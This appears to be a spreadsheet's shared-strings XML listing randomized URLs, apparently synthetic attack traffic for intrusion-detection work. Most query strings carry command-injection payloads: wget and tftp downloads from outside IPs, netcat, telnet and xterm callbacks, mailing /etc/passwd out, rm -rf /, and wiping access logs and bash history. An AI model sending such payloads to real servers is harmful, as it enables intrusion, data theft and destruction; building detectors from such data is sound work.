    <t>/ta9hbseshox/ykb2gkp9sj2a7gz/spvmgo06s5h/r8etoag5onden6qi.jpeg?aets4dmcno=lperls&amp;esxaoywg=8622069666&amp;lnceg=863&amp;0pnsni=488&amp;rcpoyhttpy=8078403840&amp;n11insertnt31q=mail+++++pllkrjr@nnk.axbd.gov+++&lt;&lt;+++/tmp/wu.c+++;</t>
  </si>
  <si>
    <t>/kbjdivecli/ralreatauitesyo/hyx0ftgbt/ettatygp/opu-szjj/npakybx-nyla/5merygbu3-/rbdvkfc/knt1mailv_acceptaw5s/eineheamueeo5b0lrtvr.js?xzdyj63reocor=isl&amp;heed0sv=iwtte&amp;owwgroupbyvbscripty=+pp&amp;n1iesvh=+petcmncmeta54&amp;onissieuase=ouw&amp;@pddrm@gcacceptjb=\\n+uftp++++-p++++www.mellntremani.com++/esveng/laalseisllsi/ns/veta/ie/chre</t>
  </si>
  <si>
    <t>/zerr7cci/0it/g1sfqllwv6sj9hx/errr8/aruxlmooc/4.1i/pevrtersselurguvb.js?pd7sm=e&amp;8lwcy=|+++++/usr/bin/nc++++-vvv++++155.30.192.48++++80_x0000_&amp;cunegoiahf0p=a9yinrti&amp;rc=hve&amp;ddlszydhoceartc=obin&amp;tzr=osandth1iv5u+eaty+t&amp;z5brpku7ptue=exkkcuu&amp;rh=5&amp;nere=kdejoh&amp;4ceecorpti5neme=steldisdineelgh</t>
  </si>
  <si>
    <t>/ua/.19j18q9d93h.css?cia0tlca8ait=s1osrggq&amp;hpisej0oi=geljgn+&amp;uc7=r-h&amp;9suc7ocoldd=\\n+++++wget+http://110.181.111.144:78140/nftp.exe&amp;4aiccscrhol=ni5iouha8d&amp;nwnps=oh&amp;taelhehn=ntlumxtoetaf/&amp;doerwiiuttoq8=qiqgltn5ua&amp;rwo=4nubahyrldaanle3n</t>
  </si>
  <si>
    <t>/auhogp3z/taemiweiloe1ehrnq/cyvgiu0stkdkewola/erisnselioologt/e8xjy4iesja/qmb1hzdmkrnodemb/lwxeagxd6h_uhen79hq/ao9wfvlwrfl/abnc6f/flsrahetiahesreas/ev/fm1qqmpp6vi1.jpg?nhsrasoradif=|+/usr/openwin/bin/xterm+-display+245.235.135.112:0_x0000_&amp;tnp=imeampwn&amp;oeelvaol=ztcwltognvsgcoteo&amp;oeyplgima=1&amp;n1o=21&amp;silner=esorirj]ar;n&amp;ldg=cac6y7ax&amp;en1theebte6i4i=4&amp;metaysfyy=an9t</t>
  </si>
  <si>
    <t>/bd/tospy6eemeta/2xg7/fkxpcqxuj/aec7j2fdz/sqcbfnrmfqad/gk9_l7jph/leiooeheoaet/allrishttpsrp@kxnt3at/gzreplaced9utelneti/psy5khmfwlvphp.asmx?sdume=2&amp;ouwixgelpg=41972115&amp;tav8rpisu7ntis9=yhqp8mu&amp;thacyb505d5hun=h&amp;zo5m7ioyo=952889&amp;3vfnuyg1-ks_=6947917&amp;asij=&gt;f&amp;1lpz=ho2ra6vbscriptei&amp;cfp=67&amp;yperl@pzas=018573&amp;cisqmhnoywmm=rm++-f++/var/log/httpd/access_log+;&amp;6rv0snghne70sr=hdpzo7wsvjkx</t>
  </si>
  <si>
    <t>/deoxt8i_2hhr/cdetoylasi10eseett/-ithavinghk.0/tuwoq/lorgefs/fba.tadzlm8qvqa7.php?zu=\\"++\\;+++\\/usr\\/bin\\/telnet+www.ererngieen.com+++638\\;&amp;.dvn11kidk9=j:a+frdhoe&amp;rcen4a8auetas5b=4dr&amp;xowba0=a|u-c\\rasystem</t>
  </si>
  <si>
    <t>/boyect/6rqrho/kttxrlheo9ga9nphtafh/xedh/ngkllaxs9h/trglui-id_l5enxv6hbj/zksfd3rrnj/srhl7yatk1yfprs1znp/rcr6oiiteedmphkieqp5/lphs-umh.bin?clascdkh=twnodedstenntr&amp;gqf2abl021g=qtpceykdet&amp;totfhtu4=nas&amp;lnrniho=5895&amp;hef2rlnminsspt=72993498&amp;ik0ns_dqo=130309439&amp;utlrbetweensp2where3yobject=nshutdown9'nrad3+adiv&amp;tluenxuogz7=hytrnh3aaj&amp;httpsgmom.fr=d8vbscriptrwnhle%uzhe&amp;qioaqpind=bnj&amp;on=/perl++/tmp/sentne.pl++++-p9342&amp;gizatilp5t=67&amp;iie=s/homeexecf&amp;fnhlfb=2wimnt+mren&amp;vrpmossga=sh2t</t>
  </si>
  <si>
    <t>/_il33_8apy0ekyunion/rjnvzipy/uq2pht-kh/9m/eelrlmentaih6nkeurd/idbtr6dx.g_23nbn.png?nrcoemah=p6etbi&amp;sbkp8dx=rnnroecho7xp_icqnqud&amp;exec4formbnr=|cat++/etc/passwd+++|&amp;dysydw=261</t>
  </si>
  <si>
    <t>/bvaotsedotonh.html?wi=iep9&amp;satnabrosa7r=58694901&amp;ifidmn=/bin/ps_x0000_++++|&amp;rndweqaihd4=8176085&amp;sjl9._j=7977220&amp;8m-7kpqr3q=7h</t>
  </si>
  <si>
    <t>/ajtrk3dtbgsrrxctls3/b33ws_/ool77r/hbrp0ionfmsysjeys/mk63frkrgl0hdwiqdjx/rceeh6nxb91ujhikr@.mspx?aooaetnmnecg=1089&amp;jm3vbcdwets=ywehtacces)eat5&amp;ju7ehafuxe=n&amp;body2.hbodyw=155554&amp;wdrs2aem=1e0+gtcefeaoptayt&amp;ar9styrdearlig=nc$d&amp;tkotn=75645680&amp;optormp=5-rn+iincludee+&gt;echo+princludesto&amp;teaa2=odsnysuauo&amp;dxwmtyffpyjb=zesmlu=dccpassthruz&amp;a9cea=tdgd&amp;eued=095&amp;mmpsyetqc=8&amp;9jmzyef='+++;++rm+++++~/.bash_history+;&amp;whns=v+mail</t>
  </si>
  <si>
    <t>/kj@kwttu.bin?itftai2bdqrrla=ysui5(n7y5ed1fwp-&amp;s5jroan='+++;+++ps++-aux;&amp;erhpo=nyuirufcbudx&amp;lpasswdbk=@&amp;9%i9b5o+wgetsrupy/a&amp;hfc@bh0=:ya&amp;5425teuhseua7=27516</t>
  </si>
  <si>
    <t>/omsa4/9iat9dmh/iq6ppfe@/_we7msv/e51kq452/imn8tt/n1ljlge9d2hrj@nwd/iun.js?ximaxss=5e15&amp;npnmel2groa=357833&amp;tatr="+++++;+++++telnet+++88.84.217.21+++++80++++;</t>
  </si>
  <si>
    <t>/owynws7vyb96ytspu/enge3nv_jaahej/eei/wbtfvh/oe.p8upflgaq3t/37ti/rzte7xtahucosx.mdb?aqn9like9p8=`++++rm+++-rf++++/+++`&amp;eoi2wanteddchp=52122022</t>
  </si>
  <si>
    <t>/bxnits--5hdroppm0h/sam_ft9kqfq5dpzpf/ezqytsai1hfsn/ptdhivtec/ra/ieteeuiae4eoaspcasro/svctjua6tfrgkdvcx3/ulnrothsaowenou/eivjbrn/ntmg.mdb?stypt1utidjno3l=hlel&gt;&amp;tyfb8w=\\rxterm+++++-display+207.208.120.62:0.0&amp;lynt=:catzposition&amp;epl4=itwj3u&amp;tmi38tisa=720&amp;yueai8deni=n/forml&amp;eroos=x'adlinkv&amp;lr=cooi&amp;i2o1no=360767142&amp;vyxc8ks=ti69the</t>
  </si>
  <si>
    <t>/tk8a_jg83/zechopscb_e.s2fsystem/te.n_kurd2gs/lmyp6tmx/@zuktlhc/e8fyy07u.cb39subk_.exe?92wet7d49yo=)cd&amp;nrreoe9taii=rhshutdownltesft@1'a&amp;xa7e14tostksroi=sczvzr&amp;anae4xseia=abetweennn&amp;oitqk5oajtb=andw&amp;pp@ndnando@owf=nsyesletetase&amp;mxd4cgrgita7=tshebyemyj&amp;hodelemaz=+ucqrnaobyma&amp;qkeste=148768&amp;bwums0p0-j=28634&amp;hneieesheeseso=6he3et&amp;daosnlil=ttmselect&amp;tosj=h(jew+s1ftduselectimg)&amp;iooimruienrawh=7194121&amp;pls4m28=+;+echo++++;w+++;+uname++-a+++;++++id</t>
  </si>
  <si>
    <t>/drdnkd/k@bd0cfbvyjt4zil/1-vfrj5iwginj0/pjateelyetcjntede/nl/sm/tytrtno3.1.asp?auhl2ft3ol0th=fvv&amp;nmoo0wc=[&amp;c7arsreseeajwt=oftesrdderih&amp;ruwfxagl=sirs|wllpm?ed%p&amp;byid=eurui&amp;hht5zkrafcrtsc=0&amp;nhktd=p.dbcni77i&amp;jiolv8jsr5b=9er&amp;ru2lnsexl3l0h=+++nc++www.enetas.com++80;&amp;onoerjrtcwelatn=tbtody-r&amp;pzacceptk73q-ic8e=blntqe&amp;ikleaido=izeua3replaceml&amp;efh9nele=u)tiyhngvhldsai</t>
  </si>
  <si>
    <t>/e.zaxtqbixicbesaiv/beoroj31te/zk.png?mbp=laqe|vkq]a&amp;t04ooje=axl&amp;7xhthx=svarscript&amp;h74tcis1hcali='+++;+cat+++/tmp/res++mail+++++stndchme@geilteta.com+;&amp;enhnrnleoyhd4ew=~rzvo8elink7lf?ip0anrt&amp;locationl1tmpmgzdrm=ahedsthtpc2aoa&amp;eowrvoemyo=91662803&amp;5s0aaafurn9targ=wrmyvka8z&amp;ae3aea=t-3ppr&amp;am5ia0iee78=eydh18poffpm&amp;tta0efsle=ihrtie&amp;aofooein=ovtemr+tj&amp;bjl9dxterm=2vns</t>
  </si>
  <si>
    <t>/dhm35zw.x/dd6nfw4/wuuemkbhpiya/ntsaoi0tasemeirlze/que5esawyzjc5ji/ep8gzib3/r98izdjlzk3rckuxt4/at.asp?hoevet=mail+++++aded3ih@eeknve.wndt.gov+&lt;&lt;/tmp/wu.c;</t>
  </si>
  <si>
    <t>/nthttrnaxa40tt3/mti/jmrrsmyeietenoie/9v7k/tbtiao2leyleatrgaoi.nsf?iis8me=a6ibllseoao&amp;ksgjtse=eu&amp;3dpln=m-4gu&amp;5efpbh9=5a1rr&amp;egsoor=+z&amp;eelzixegnhnah=a$&amp;slais=275&amp;eu=tidhagb&amp;epjh=yl4duutl&amp;tysnatrdn='++;uftp+-g++/home/vesiniales/naleontiasel++145.139.254.182++++/tror++++;&amp;axyeaieees=38616697&amp;4os24=f2nsbq</t>
  </si>
  <si>
    <t>/o47m8qm7.5kmlh9pk@/k4u9jdy/oytrh/2solsndafesphaiea/er6a8dnh8ry/he/n@0i50ptntej3kxgcab/protttudgoes6raat0n/i9oorghas/eztieo8mtnotedtuo7bl.mspx?iqfnteeo=8hbuiqroetifesa&amp;end8ea=090333337&amp;reeboelm5ngo=8horcoahbeh9ca&amp;lweddthsitaey=38428199&amp;otaotit=3&amp;otgoaama=';+++++rm++~/.bash_history++;&amp;oa34m=1452</t>
  </si>
  <si>
    <t>/co_a7_c3mmbl.3/thees/e@jo8/ehwradminz./dvocatba4eo/inbill3rbormeogtmnb/sjpzciwbqq/lwpuzkm0.4upiu5nr/krsepaxoai/hubz/5p8rm/oknndy.cgi?wsambndl58oj=enjrte2m&amp;qecpbz=etnmaeideleteot&amp;eaegmdhsdenhoto=+cat++++/etc/passwd+++</t>
  </si>
  <si>
    <t>/oe8tnpeatmhaehmiulo9/lhanqonh6cgpr/skc/nzearlwekedittwso/s2jbmw/4@bw83/nalrge/jedstdrenocat7/an/0l1sbodyliba0aytjexec8/aewi.msf?t65tiel=\\"++++\\;++\\/usr\\/bin\\/telnet++www.matotoit.com+6387;&amp;dahb=0&amp;openfromvflibik=be]&gt;&amp;vwk0httpsvisscripto=$hihf&amp;rros=emtoeooruweno&amp;hinf3ohya1s=56626334&amp;rmarsnw79ia4=bdp0cn2lpm</t>
  </si>
  <si>
    <t>/fejj1edv.pl?fromxmjsht=++xterm+++++-display+++++www.ntri.com:0.0++&amp;5hmc2bps=pmk.z5p&amp;rctkrna1eene=0105416&amp;xk6s4jwwa=c&gt;isfdrs7a$reieg+)a</t>
  </si>
  <si>
    <t>/v_pbzxz.asmx?aur6aaiudte4=nil9oto&amp;rk.mb3acs=p8&amp;elufjomedl=c+alleusrysrimgsmrp|+cy0+&amp;ena=g.unlrct_l&amp;ttl=oh%lcn8slln;r&amp;llsy2mu9=tsmailioi&amp;toisd=81&amp;yezi0h=23170&amp;zfy9givu=tcfleo&amp;inubdisidm='+++++;+cat++++/tmp/res++mail+ie@el.com++;&amp;oeba7sivuca=okvm-tszi5kp</t>
  </si>
  <si>
    <t>/lafp5x/hxeoeooptpnlet/rsstne5itc7xwprs.tiff?rartbwlaunri=)1marom9wherels&amp;epvaeaerlaaists=hrcpiza&gt;&amp;tl3ojeyte=liui&amp;9nrsaml34yrx=iejimycyytaiese&amp;mes0seseeapfa5='++;+tftp++++-c+++get+++++www.isitreanor.com:/ataten.tar&amp;ei2nhwi=3&amp;fnaassmitr=1290976&amp;hdom=rqtewteoee</t>
  </si>
  <si>
    <t>/nnm/u_v7hyrojjisf/1gmeejgo/ubf/cxcfeqdn/ya/otmhttps05a.jpg?kjvdvbscriptytg=669&amp;67as23=|+cat+../../../../../../../etc/passwd++|&amp;nahukgn=348056</t>
  </si>
  <si>
    <t>/y9ereawaoltee6amtrsr/aiatgavmihi/et/pkerrx.jpg?gmd0=sptrsrlirrase&amp;eiea2e14tgeisoe=ttg&amp;gjt229=ucgc&amp;azh=54050&amp;pcwch3wmizdt=u&amp;c5s=9486760&amp;qtneap3li=rm+-f+++/var/log/httpd/access_log++;&amp;eophf=wiiaos</t>
  </si>
  <si>
    <t>/hia.jsp?bloj0ocfc6lsctq=402&amp;zggygxh=\\;+++++\\/bin\\/id+++;&amp;nehsdnsu=eter&amp;tbeenthmttsz=c2eumoedb&amp;aeeeacscncaati=infasr</t>
  </si>
  <si>
    <t>/updatema/geclotihat/dabtylntensanrdie/fk/eu_ywvgszg@felyajdf/p1autoexec0mlhqi/mh7cgl_/yj6s/3p9@txz4d2p/updatebthconnectiautoexec1kzgw8@.gif?oyoefse=0sn&amp;ahrsrkcdts=293&amp;ethiwaukl=ahmtg4rtdekmeta29&amp;wme-b=++++;++++echo+++++++++;++w++++;++++uname++-a++++;++++id&amp;ebandaf5=j+n+</t>
  </si>
  <si>
    <t>/x8zbaj9g/ap7hbff@ux.gif?sly8nt=\\nls++/root/</t>
  </si>
  <si>
    <t>/oddtonrsnynyfos/gillocr1esrdbnhqsf/eus23loivdhh/otrtnito/qy-14k.-6degx2pb2/tgcemkt6e1tu.htm?xtadahttwte=teleentepo&amp;ui4heiisrl6=9@y9kyx&amp;6e4ohpd=\\r+xterm+++-display++20.152.25.116:0.0</t>
  </si>
  <si>
    <t>/gd/ttwfae837ehheguiceoe/edixan/kujssbl0tbybxwrrx@i/n2_piomnsw9/7op/aqi4dd1lrolnbbioza/anl5f0ei4tgoc/rguso6umamconnect.u@4/uifdmeponllgsne9nen/riahhi6so/hwgftg@5@n_c.jpeg?xrer=itw=3ters&amp;kxqyl=ies&amp;8lfm4zrs='+++++;++rm+~/.bash_history++;&amp;staite1fennhreb=n|qeelwget&amp;po8mahofoia=r_77dhfazz@&amp;hsmhel0mna=cqpmkykaxqt_&amp;onr=2422&amp;sudbtqae=bqnzwy&amp;imf=7abtoaehnlanni</t>
  </si>
  <si>
    <t>/wth_ktbtkzfoy.phq9n/p1lx/y9h/3ud/cq2/ms0ti/an5orygooh/ilifltpi3dylbwvhycx/rlthttbh2.vbwqx-tsaj/sssbm9a/emginr/telnetbinfiksqmaccess_log.pl?3ey=svatehueat/d&amp;tteaefenpeoemsr=268421&amp;bl=9291239&amp;a3=nccstwrcos36qu&amp;yatiee=woaco&amp;nd2r37bgtueuie=o/f&amp;h3a=81260637&amp;ols=iwipu6bozl&amp;eoibtpn=nn0ybody?aa=f&amp;a7pnlh=';ps++++-aux+;&amp;ltn9tsslm=qodoo1mnexecs&amp;uh8ld=cgtekbt&amp;etdtsoc1wsii=7460</t>
  </si>
  <si>
    <t>/window.opencujwl/3lwntdnksa_p/snozcjn/6kjq/hpqxpbc/o@.@dcr.swf?h@ud=7850680&amp;21juxrn=tade9execr&amp;rdyih=ew3bbpg2lms&amp;jn=iznrs2nch?h&amp;dso&amp;saikrc=4tu9o&amp;ioao=31469496&amp;nre5enog=\\n+++++wget+++http://101.96.156.205:2465/nftp.exe&amp;i2lkeaahurftb=cbp.ucb8ejis</t>
  </si>
  <si>
    <t>/wte/d-emmqdefiivgdck/u1edooaanhes/aen0.asmx?e9ersscelsnecu=qraa&amp;ntztainh6=sh6dneice&amp;zht3plotaebaen=503481427&amp;odf7h=agerot00ruaou&amp;utera=jdenrvh2mszgdy&amp;euen=n'&amp;ear3usg5stsa=3678&amp;eeir8injeneoed=+++++;++echo+++++;++++w+++++++;++++uname++++-a++++++;+id&amp;a50hz9ec6uveibd=8</t>
  </si>
  <si>
    <t>/plmht4f5aprkarvekr3r/0acsrlqlne0hdraqntn/cudljempdalto/baztccerkxeaa3/crhr_eval/ne1tenisqouet6eat/jfveeinehuceswugcai9/ukioe/c3q/xkmykrfo72tk/n_ezj3m/tgpghohb0mp1_ih70ge.jsp?.fylz=h2b+e+aej&amp;b5lt2bdl0haiat=\\nls++/root/&amp;earsketts=fhntwgeterscript&amp;1i4ha=oxtlpsgttstres&amp;eeimfd=i)srhthroeboot.inie&amp;radsdaatut5aly=i+ere9hygttelnet1drieed+r&amp;zehowr2adt=owe9bac4&amp;9tq=8&amp;cyat4wroe81eo=oa+ame%ieetvbscripteopta</t>
  </si>
  <si>
    <t>/ierffhqe.sh?9elepihaea9undo=a%shsnsir9&gt;n&amp;ayceoeiodf=\\"++\\;+++\\/usr\\/bin\\/telnet+++www.esntetrons.com+++++13\\;&amp;yprh5liehur=96083&amp;wjahnns2n8vtp6=zpbiitra+e[oe&amp;fzrey=en</t>
  </si>
  <si>
    <t>/t@6cgeny0tph/iieywteaeetenouu1neg/tvv0yha0v60bbqdgsbu/qo6vvfz1adk/telnettbsehp/osnirnnnrlvsest/7psa5rj5eikgmptdtxqg/0e-gvzx1ugj/hwu4a2l/owsh1i-nngt4c_etcfgq/nse4aieved3.pl?4fxb92qx2c6u=488611&amp;n6=ibp&amp;lan=|+cat++++../../../../../../../etc/passwd+|&amp;s5tswr=voj</t>
  </si>
  <si>
    <t>/hfaadusrl/e5h0qpr0wup/ye@bmo3rcwp3kusr/nozres-processing-instructionb/style_wgetyo/nesmeiwyynthercpwmwj/wp6olhxnttmted7che/tpv6w.msf?vzehtzytryrn=+++++nc++www.nsattali.com++++80+++;</t>
  </si>
  <si>
    <t>/eiih8o/7tt2xzrqkyhhgai/uigr-07obd@ljkmcqe/ccaih/vkjn7srz8l856q/spdeuikl0bfphpunion/blphuotm/owmdqw8faviqpuqb/.njthbir/ddvsoonftehohi9tzwe/wdai7moma1u58q7eaui.css?ie9a=+ote&amp;cinunion=|+++cat+/etc/passwd&amp;lc=goldnqou7</t>
  </si>
  <si>
    <t>/trs/positionglfd9./etkb/eoibhnjniasz7.cfm?filn0sil=)echo9oscripthavingiemog&amp;ast9jrwsksabeld=lj9&amp;er0rebfd=65&amp;rzdianayeoht=aaedlxo0ee&amp;ua8drlfke7t2t=55668&amp;eristlkbgsoundyzl=aj6v&amp;mteeec=|a-upnqw+oen0amochah&amp;koar=+++++;+++echo+++++++;+++++w+++;+++uname+++++-a++++++;++id&amp;hkatm=2279376</t>
  </si>
  <si>
    <t>/c0w5y1mow2u0lct/hsansc/kpq01vjb.pxmyptqi8k/eanhneq7i6eanehj/11.nsf?tcsedf=oops;+++++cat+++/etc/passwd|+++++mail++++your@rnuaw.com&amp;.xjxw=tp23rtei0ott&amp;ftplsryief6h=17477&amp;ra3n2=@yc&amp;teny=h+pso0+)rsyxtermtelnetkm</t>
  </si>
  <si>
    <t>/geimap2/pretseah2tel1/aehnihh/xwl5scdxjt3dn7/pvosnpnkthp_h/f1olearr/cypg5u_erwt/r62j5lgisbebny/yawwbsex/nx3wxqywaxggkzl_s.exe?amd5aed6igsiod=8059332893&amp;1aienumh=6974525422&amp;o6abe=ecwarhosrti2zhvar&amp;5thdgt=\\n+++wget+http://99.125.138.90:60/nftp.exe&amp;s5bttnroean=rhyyiomgotbaagccn&amp;e2za=1892272&amp;nina7tnf=zaul-ral+ainmetaideletea&amp;zre1d1non0u=anror&amp;t4xhfoaeniao=119703&amp;csfhsmhiaanehin=nuaxqicenetc&amp;engoidcreplacejyn=+ekap9tx@3&amp;it6atvohdtoexp1=130740&amp;5rspngsq6d1=9885&amp;vdimicvintrqni=ry_sx2a4qpn&amp;smdurinxaestai=9ti'oee5rm+)f</t>
  </si>
  <si>
    <t>/eeotaeeih8lr1eeoat/sg_zh-/lmowz/o7cuc/4v5ew/3s.html?y2bo7ei=+&amp;io=tftp+++-c++get+++++219.148.177.152:/genire/marear.exe+|&amp;s8wsni=903&amp;bdeo1do=7666815&amp;eoe=aded3uent0aopdprtb&amp;oifa=opat4ttor&amp;gemuiusadhn=4560&amp;ctovaecoj=yaafscdpntipr&amp;etp=cf9esiamt%iunsmogroup+by85e&amp;4pusropr=r27nn+bnnexecc7zxan&amp;awciisirsiiseat=wtp7vlksasrm&amp;uyghe0mj=srm\\[bsah?&amp;aersletst1oetme=sock_streamaiw&lt;winntde&amp;eue=h&amp;pu9kzf6l=nh4</t>
  </si>
  <si>
    <t>/yla5execau/passwdnetcatk5c1lk@f3iufm/eofdoeou5nietbc4rt/cmd7%uhh/nvoideexe/ex5i09@fkr1m0mwoq/9dengxusdydusrehe/vromsiinwy/ikvxrwjgwqcescfu.exe?kcri4arxp_=il6hts5thphta&amp;yhsd=';uftp+++-g+++/home/esmellntse/itatasleti++179.63.15.128+/ol+++;&amp;tmlian=nmw0tdlwtc&lt;:e&amp;eblntedltaae7ct=eqhhdoox&amp;ph2ulbi=itm&amp;scg6keen=19&amp;k6ois7i=liboyyeshutdownacceptut&amp;l9pqfr=r&amp;6l=3917277917&amp;co4ul=tdl</t>
  </si>
  <si>
    <t>/nee0uone/t-zkje7/soreiav/03/frompxperlvr0fdb6lfq.js?nperlvy='+;+++tftp+++-c+++get+www.eliela.com:/mensisan.tar&amp;tiiepswa6ecb=4495&amp;665sgesupdatesystemxtermm=37976838&amp;e6esiehg1meo=u&amp;w_k@window.open0yu=fdexn?teaosorreete)a&amp;somtiaziusn=31691&amp;nfim7uonl=rsohe5&amp;6m=rilg&amp;cctui=13004&amp;sibtrnuaigwb=913617&amp;hho=9tspl&amp;itveyae=ce6&amp;5onrcrb=logdelete</t>
  </si>
  <si>
    <t>/stsapopdnts/epa1zn3e/hto5tdahausm2dtbyiuo/ikh5-xup/ejjiqrccs3wm2wbty.css?6lami=7329&amp;s2petnnn6zsz=%ur&amp;c._httpsenzksc71=omitnnc/m&amp;edstpu=tfgeuaiz_s5d&amp;ooesi7geo=';+tftp++++-c++++get+www.orliie.com:/lira.tar</t>
  </si>
  <si>
    <t>/gdtadroizel/mvzjgap8wp/enntantr/in7tu/dhtdnt3g1nroenhmidm4/aailwi.dll?nr1wvzstdintbodyub=';++++tftp++++-c++get++www.asennsisll.com:/nt.tar&amp;onswa3lhf7ne9=rarqexse&amp;ultc=dn]p&amp;oltieij=i+ilnwsecae++replacer3passwd</t>
  </si>
  <si>
    <t>/zqtgirrm/tte04retnnnrhahrt.tiff?lupm=q3linputcbinjsdjem=3t&amp;c4hz0@=osotwtz&amp;t-lfyc7=gxeiti4servicesvtsna&amp;rn52oolb=4439&amp;09ihiiat2wrlgdx=&amp;otnnceoaw-topts6aoa(&amp;tvcdiihey5hhsu=47&amp;h7oek=523077&amp;ttttrridi=svpl&amp;whnr=0&amp;iqnrtwian4whoo=|id++|&amp;ibsslrgt=6ena\\epooeieaak&amp;tjem7=28</t>
  </si>
  <si>
    <t>/rlz.css?3srydtan1voat=1&amp;qd0q1vc0u5x=4oh6+&amp;eiehuraozrtoete=|id;&amp;de2qdropenn=276&amp;82ro=deeurt&amp;dtfhedzr=+teb&amp;61qbiframe=ldg&amp;daaqbkpklc=r8&amp;euzutgno=d%a&amp;aacamrds3a=j&amp;ihtaha1ae=tinlt+e4fttn&amp;dgkznpiitis=lh;h+&amp;daq+-t[</t>
  </si>
  <si>
    <t>/b-/pc@dgtxs/gzckkqjidqg/c1vn6neev/lhhtn4eut/i9qevxrpoc7d/aoem8h..i.aspx?ieeguaeccntqfp=+cwgettch&amp;m+s4ocre&amp;in=uq6&amp;cfcovwzxv@=mail++xls2rtpid3@eavp2sev.diili3.gov+++&lt;&lt;++/tmp/wu.c++++;&amp;lth6cse=024</t>
  </si>
  <si>
    <t>/mailc38hljgl8bu/tgcwrf.2cz/a7bkjwvy-4kfros5/httpgixxt/nullx.gif?uii=utxdyxeyaofiiey9&amp;lsaycndaeroft=/e&amp;tjecp0s7gngkn5=++;+++++echo++++;++w++;++uname+++-a++++;++id&amp;h3deoi=27466&amp;ats9oeecu6pn=473970&amp;pblgkacceptl=:sotmpcewr;wruy&amp;0a4cmdagmocha5cubgsoundln=xretu94zasew6&amp;enestu3hwdues=tbsef&amp;&amp;aah=296&amp;l9em6w=36031812&amp;ehsasfte4=foza</t>
  </si>
  <si>
    <t>/idqlmt1tcter/n2apz1.tiff?nt=saspelooe&amp;rkuavz=734025&amp;ded=efphp|btdgroup+byinpesscriptsa-between?&amp;daosomaa=ibdzha&amp;nnssgndebssie=|+++cat+++++/etc/passwd&amp;5cc=idzt&amp;qw6etjcr5i=2&amp;a5a=55&amp;lito0ia=ecmzhl_</t>
  </si>
  <si>
    <t>/lhnjie2tir/txv/zaj/ecupbtosnut-3/rjhehrhinelwthd/sznaeo8hefcecilps/deaiosqee1ti3.jpg?tachdyltn=s_wnd-k&amp;m0aomclc=u5id8m4&amp;gnryopasswk=634787&amp;hseemtme=eafynd5t&amp;xn=nis&amp;ntuonea=';++rm++++~/.bash_history+;&amp;eu=esc5|iir&amp;ye=ghesmtsthenls1&amp;re=78624997&amp;cesla46ves3y=8518&amp;jba5=t&amp;pj3e=ostm&amp;meoigeihshtc=hxtermtlibe+bsystem[psetc</t>
  </si>
  <si>
    <t>/iwmi-d/sv5l.@q.e23gze2wcn/etietuermypo/rj/yspclas/hxi8fruymg.htm?havingwju7fvar2sstyle=47247&amp;hrlaont=wfes&amp;nry1scm=he0xbq9kz_@9&amp;aeet6he4ltwar=y&amp;e&amp;w8m.s_zudz=l&amp;rinfton=avswp@tr&amp;x0ewj9rscriptlq-h=cgbk.&amp;iiotrt=tcth3tn6aac&amp;iwsum6dseifhr=7ak+object&amp;rrtobn6frfut=865&amp;ob=0838&amp;nstwbh=ir&amp;dsoru=|+++++/usr/bin/nc+++++-vvv++++158.78.164.70+80_x0000_&amp;fgd3reuusn8=e7ozgww</t>
  </si>
  <si>
    <t>/ce2onas/ewkg@vvwoa3/kwindow.openrsystemze2j3w9/au9wherejquzpboi/hxis@t/o2zsc6ny71lvppb6n/iwndebto5l/rjdffvzuzf/0fdehyf8ponie/mstd0zirx7i/z@td%u93p1j_/fm.png?nn7ewe9du=tt_wkpvk@i&amp;uhnnwted=iootg&amp;jincludehpatbka9pn=76593&amp;yicrehi=8&amp;msa8aenrie=zaexob1j0object&amp;vu40caiunev=85&amp;afbldn2eitieeos=lec&amp;eptmdae5z=t8cywwsif&amp;vr.2g3nw=056557&amp;raaainera0afn=/perl+++/tmp/toen.pl+++-p5250&amp;eoxnehgaze=13866452&amp;aird1uqlottm=e1ztgn8&amp;ttropujaaciiis=objectultmeji2lwindow.openlc&amp;n5el=+htt&amp;cltu=1scin1ave</t>
  </si>
  <si>
    <t>/itseene/o3zp5rqz2pkp8mh9u4/.mm/fsaetuae4tyejnhs/qivdfo.9mi8wuezyukt/aobqpczs0@46/maileval0mrukq/utuzt/buuxkkubk.shtml?lubeahbswsefm=6ssnecoq&amp;4zqnacz=2295&amp;yldehsino=mrdt&amp;91s=qeedi&amp;lcnowttit=na&amp;eheokxroctpeat=4a\\&amp;ronkdtrgcagt5t=rom&amp;mkch=l'i/copyhi~8a&amp;d7mewepee=|+id+|&amp;spee2aacetcenhe=189118&amp;6x=de&amp;wedjktsgoe=107058</t>
  </si>
  <si>
    <t>/_xspfmuatelnete9/adowptesvjevr5vw.jpeg?srxtabor0t=p0dck&amp;iqzcf=access_logys2:xioi9&amp;qiydn6k.h7=34913&amp;saosoteprorr=0z9&amp;dndd3ethftfse=|+++ps+++-auxwww+;&amp;mrsmaktu=892475&amp;xeeafao2dn=)h&amp;9sh9ft=olstdga%dtp?ddvia&amp;hua5ggl87ceroee=ve&amp;elr7ymoesgd=epte4engecr</t>
  </si>
  <si>
    <t>/ts/clmdbf0_k/mn8ssc/vpceht9a7gops0yorpt/aia8ah9ipbasg6aii2/eljn/pawhereqptfboxgc.html?4ers=bsraeroettd&amp;fcsqt6o=kwybno:+hrgn5~t&amp;irqcee3yhoj4ba=positione&amp;ilyh=hi0co7umc8&amp;6z@hdlw=tohn+&amp;1sonhlagmheoe=s%uj~i&amp;9fsuln1h=857699581&amp;noseektdemepx=+u5&amp;orhgtrac=4021872&amp;s4moorrslstbd=ls++-las+/home/+++++|&amp;cp=0746624&amp;l4neelh=nwtetcjsrzsiayopt&amp;s9l4hn=linkweurdixrcpt&amp;rei7sh4chae=465&amp;rboot.inisapasswd0pmh=?sens</t>
  </si>
  <si>
    <t>/thahtaldr6tqo7/1eozkp/u@/2lsolc/x_cwgy.pl?o85rfndivhtacceslpasswdnodei=++cat+++++/etc/passwd++++&amp;am9utblnr548jnc=tahfd8ht0hsp</t>
  </si>
  <si>
    <t>/iilhsxns8bnbkh/n3tnesot4detoerr5ea/ogh/vcew3tzrtu/h0mofxi-z0ki8crx/idx6gsiysuskkwzp/sdptnahaegsp/ejrlc-.cfm?menegiohbahs='+;uftp++-g++/home/roinna/elatchmamees+++++152.28.11.120++/icnsma++;</t>
  </si>
  <si>
    <t>/lnetcatzct.php4?9bsijmtrd1e8xu=\\nls++++/root/&amp;tal='h;hlnrc[ml0doauo</t>
  </si>
  <si>
